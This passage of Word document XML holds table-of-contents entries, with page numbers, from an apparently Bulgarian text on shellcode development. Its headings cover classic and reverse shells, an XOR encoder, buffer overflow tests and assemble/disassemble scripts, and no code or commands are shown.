              <w:instrText xml:space="preserve"> PAGEREF _Toc3540767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540768" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.4.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mov label(%rip), %rax</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540768 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540769" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.4.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Предположения за изпълнението</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540769 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540770" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разработване на примерен шелкод</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540770 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540771" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.5.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Класически shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540771 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540772" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.5.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reverse shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540772 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540773" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.5.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xor encoder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540773 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540774" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.5.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Тест за директно изпълнение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540774 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540775" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.5.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Тест за buffer overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540775 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540776" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Скриптове</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540776 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540777" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.6.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Extract</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540777 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540778" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.6.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Assemble</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540778 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540779" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.6.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Disassemble</w:t>
            </w:r>
            <w:r>
              <w:rPr>
